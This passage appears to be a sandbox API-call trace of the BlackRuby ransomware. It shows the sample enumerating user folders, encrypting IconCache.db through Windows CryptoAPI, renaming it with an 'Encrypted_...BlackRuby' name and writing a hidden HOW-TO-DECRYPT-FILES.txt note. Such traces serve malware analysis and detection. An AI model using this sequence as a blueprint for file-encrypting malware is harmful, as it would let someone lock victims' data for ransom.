[0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.449] GetLastError () returned 0x12 [0048.449] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0048.450] SetErrorMode (uMode=0x0) returned 0x1 [0048.450] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.450] GetLastError () returned 0x12 [0048.450] SetErrorMode (uMode=0x1) returned 0x0 [0048.450] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x1c9f254 | out: lpFileInformation=0x1c9f254*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x7959fd0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x7959fd0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x7c78a07f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xbd860)) returned 1 [0048.451] GetLastError () returned 0x12 [0048.451] SetErrorMode (uMode=0x0) returned 0x1 [0048.451] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.451] GetLastError () returned 0x12 [0048.451] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.451] GetLastError () returned 0x12 [0048.451] SetErrorMode (uMode=0x1) returned 0x0 [0048.451] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.451] GetLastError () returned 0x0 [0048.451] GetFileType (hFile=0x184) returned 0x1 [0048.451] SetErrorMode (uMode=0x0) returned 0x1 [0048.451] GetFileType (hFile=0x184) returned 0x1 [0048.451] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xbd860 [0048.451] GetLastError () returned 0x0 [0048.454] ReadFile (in: hFile=0x184, lpBuffer=0x2eb59a0, nNumberOfBytesToRead=0xbd860, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2eb59a0*, lpNumberOfBytesRead=0x18ed18*=0xbd860, lpOverlapped=0x0) returned 1 [0048.479] GetLastError () returned 0x0 [0048.479] CloseHandle (hObject=0x184) returned 1 [0048.479] GetLastError () returned 0x0 [0048.500] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.500] GetLastError () returned 0x0 [0048.501] SetErrorMode (uMode=0x1) returned 0x0 [0048.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x7959fd0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x7959fd0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x7c78a07f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xbd860)) returned 1 [0048.501] GetLastError () returned 0x0 [0048.501] SetErrorMode (uMode=0x0) returned 0x1 [0048.501] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.501] GetLastError () returned 0x0 [0048.501] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", dwFileAttributes=0x2020) returned 1 [0048.501] GetLastError () returned 0x0 [0048.501] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0048.501] GetLastError () returned 0x0 [0048.535] CryptImportKey (in: hProv=0x37c708, pbData=0x1b7d00c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360da0) returned 1 [0048.535] GetLastError () returned 0x0 [0048.535] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.535] GetLastError () returned 0x0 [0048.540] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.540] GetLastError () returned 0x0 [0048.540] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360b20) returned 1 [0048.540] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.540] GetLastError () returned 0x0 [0048.540] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1baa058*=0x1, dwFlags=0x0) returned 1 [0048.540] GetLastError () returned 0x0 [0048.540] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1baa024, dwFlags=0x0) returned 1 [0048.541] GetLastError () returned 0x0 [0048.544] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c008d0*, pdwDataLen=0x18ed08*=0xbd960, dwBufLen=0xbd960 | out: pbData=0x2c008d0*, pdwDataLen=0x18ed08*=0xbd960) returned 1 [0048.549] GetLastError () returned 0x0 [0048.552] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1baa0b4*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1baa0b4*, pdwDataLen=0x18ed20*=0x10) returned 1 [0048.552] GetLastError () returned 0x0 [0048.552] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1baa0e4*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1baa0e4*, pdwDataLen=0x18ed28*=0x10) returned 1 [0048.552] GetLastError () returned 0x0 [0048.573] CryptDestroyKey (hKey=0x360da0) returned 1 [0048.573] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.573] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.573] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.573] GetLastError () returned 0x0 [0048.573] SetErrorMode (uMode=0x1) returned 0x0 [0048.574] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.579] GetLastError () returned 0xb7 [0048.580] GetFileType (hFile=0x184) returned 0x1 [0048.580] SetErrorMode (uMode=0x0) returned 0x1 [0048.580] GetFileType (hFile=0x184) returned 0x1 [0048.590] CloseHandle (hObject=0x184) returned 1 [0048.590] GetLastError () returned 0xb7 [0048.590] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x2b [0048.590] GetLastError () returned 0xb7 [0048.590] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Encrypted_cLS0X7d9mfqYIWlgykTjocVVzlKumwbfaaOj8nT0Tfmo.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Encrypted_cLS0X7d9mfqYIWlgykTjocVVzlKumwbfaaOj8nT0Tfmo.BlackRuby", lpFilePart=0x0) returned 0x5f [0048.591] GetLastError () returned 0xb7 [0048.591] SetErrorMode (uMode=0x1) returned 0x0 [0048.591] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7959fd0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x7959fd0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x252a0c80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xbd970)) returned 1 [0048.591] GetLastError () returned 0xb7 [0048.591] SetErrorMode (uMode=0x0) returned 0x1 [0048.591] MoveFileW (lpExistingFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\Users\\Default\\AppData\\Local\\Encrypted_cLS0X7d9mfqYIWlgykTjocVVzlKumwbfaaOj8nT0Tfmo.BlackRuby" (normalized: "c:\\users\\default\\appdata\\local\\encrypted_cls0x7d9mfqyiwlgyktjocvvzlkumwbfaaoj8nt0tfmo.blackruby")) returned 1 [0048.591] GetLastError () returned 0xb7 [0048.592] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x37 [0048.592] GetLastError () returned 0xb7 [0048.592] SetErrorMode (uMode=0x1) returned 0x0 [0048.592] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.592] GetLastError () returned 0x0 [0048.592] GetFileType (hFile=0x184) returned 0x1 [0048.592] SetErrorMode (uMode=0x0) returned 0x1 [0048.592] GetFileType (hFile=0x184) returned 0x1 [0048.592] WriteFile (in: hFile=0x184, lpBuffer=0x1b3d738*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1b3d738*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.593] GetLastError () returned 0x0 [0048.593] CloseHandle (hObject=0x184) returned 1 [0048.593] GetLastError () returned 0x0 [0048.593] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x37 [0048.593] GetLastError () returned 0x0 [0048.593] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.593] GetLastError () returned 0x0 [0048.593] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x2f [0048.593] GetLastError () returned 0x0 [0048.594] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.594] GetLastError () returned 0x0 [0048.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.594] GetLastError () returned 0x0 [0048.594] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x2f [0048.594] GetLastError () returned 0x0 [0048.594] SetErrorMode (uMode=0x1) returned 0x0 [0048.594] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.594] GetLastError () returned 0x5 [0048.595] SetErrorMode (uMode=0x0) returned 0x1 [0048.595] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\History", lpFilePart=0x0) returned 0x26 [0048.595] GetLastError () returned 0x5 [0048.596] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.596] GetLastError () returned 0x5 [0048.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.596] GetLastError () returned 0x5 [0048.596] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\History", lpFilePart=0x0) returned 0x26 [0048.596] GetLastError () returned 0x5 [0048.596] SetErrorMode (uMode=0x1) returned 0x0 [0048.596] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.596] GetLastError () returned 0x5 [0048.597] SetErrorMode (uMode=0x0) returned 0x1 [0048.597] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x28 [0048.597] GetLastError () returned 0x5 [0048.598] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x23 [0048.598] GetLastError () returned 0x5 [0048.598] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x37 [0048.598] GetLastError () returned 0x5 [0048.598] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.598] GetLastError () returned 0x5 [0048.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.598] GetLastError () returned 0x5 [0048.598] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x37 [0048.598] GetLastError () returned 0x5 [0048.598] SetErrorMode (uMode=0x1) returned 0x0 [0048.598] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.599] GetLastError () returned 0x5 [0048.599] SetErrorMode (uMode=0x0) returned 0x1 [0048.600] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\LocalLow", lpFilePart=0x0) returned 0x21 [0048.600] GetLastError () returned 0x5 [0048.600] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.600] GetLastError () returned 0x5 [0048.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.600] GetLastError () returned 0x5 [0048.600] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\LocalLow", lpFilePart=0x0) returned 0x21 [0048.600] GetLastError () returned 0x5 [0048.600] SetErrorMode (uMode=0x1) returned 0x0 [0048.600] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.600] GetLastError () returned 0x5 [0048.600] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.600] GetLastError () returned 0x5 [0048.601] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.601] GetLastError () returned 0x12 [0048.601] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.601] SetErrorMode (uMode=0x0) returned 0x1 [0048.601] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\LocalLow", lpFilePart=0x0) returned 0x21 [0048.601] GetLastError () returned 0x12 [0048.601] SetErrorMode (uMode=0x1) returned 0x0 [0048.601] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.601] GetLastError () returned 0x12 [0048.601] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.601] GetLastError () returned 0x12 [0048.601] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.601] GetLastError () returned 0x12 [0048.601] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.601] SetErrorMode (uMode=0x0) returned 0x1 [0048.601] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming", lpFilePart=0x0) returned 0x20 [0048.601] GetLastError () returned 0x12 [0048.601] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.601] GetLastError () returned 0x12 [0048.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.602] GetLastError () returned 0x12 [0048.602] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming", lpFilePart=0x0) returned 0x20 [0048.602] GetLastError () returned 0x12 [0048.602] SetErrorMode (uMode=0x1) returned 0x0 [0048.602] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.602] GetLastError () returned 0x12 [0048.602] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.602] GetLastError () returned 0x12 [0048.602] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.602] GetLastError () returned 0x12 [0048.602] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.602] GetLastError () returned 0x12 [0048.602] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.602] GetLastError () returned 0x12 [0048.602] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.602] SetErrorMode (uMode=0x0) returned 0x1 [0048.602] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming", lpFilePart=0x0) returned 0x20 [0048.602] GetLastError () returned 0x12 [0048.602] SetErrorMode (uMode=0x1) returned 0x0 [0048.602] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.603] GetLastError () returned 0x12 [0048.603] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.603] GetLastError () returned 0x12 [0048.603] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.603] GetLastError () returned 0x12 [0048.603] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.603] GetLastError () returned 0x12 [0048.603] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.603] GetLastError () returned 0x12 [0048.603] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.603] SetErrorMode (uMode=0x0) returned 0x1 [0048.603] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2b [0048.603] GetLastError () returned 0x12 [0048.603] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.603] GetLastError () returned 0x12 [0048.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.603] GetLastError () returned 0x12 [0048.603] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2b [0048.603] GetLastError () returned 0x12 [0048.603] SetErrorMode (uMode=0x1) returned 0x0 [0048.603] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.604] GetLastError () returned 0x12 [0048.604] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.604] GetLastError () returned 0x12 [0048.604] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.604] GetLastError () returned 0x12 [0048.604] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.604] GetLastError () returned 0x12 [0048.604] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.604] SetErrorMode (uMode=0x0) returned 0x1 [0048.604] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2b [0048.604] GetLastError () returned 0x12 [0048.604] SetErrorMode (uMode=0x1) returned 0x0 [0048.604] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.604] GetLastError () returned 0x12 [0048.604] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.604] GetLastError () returned 0x12 [0048.604] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.604] GetLastError () returned 0x12 [0048.604] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.604] GetLastError () returned 0x12 [0048.605] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.605] SetErrorMode (uMode=0x0) returned 0x1 [0048.605] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", lpFilePart=0x0) returned 0x52 [0048.605] GetLastError () returned 0x12 [0048.605] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.605] GetLastError () returned 0x12 [0048.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.605] GetLastError () returned 0x12 [0048.605] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", lpFilePart=0x0) returned 0x52 [0048.605] GetLastError () returned 0x12 [0048.605] SetErrorMode (uMode=0x1) returned 0x0 [0048.605] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.605] GetLastError () returned 0x12 [0048.605] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.605] GetLastError () returned 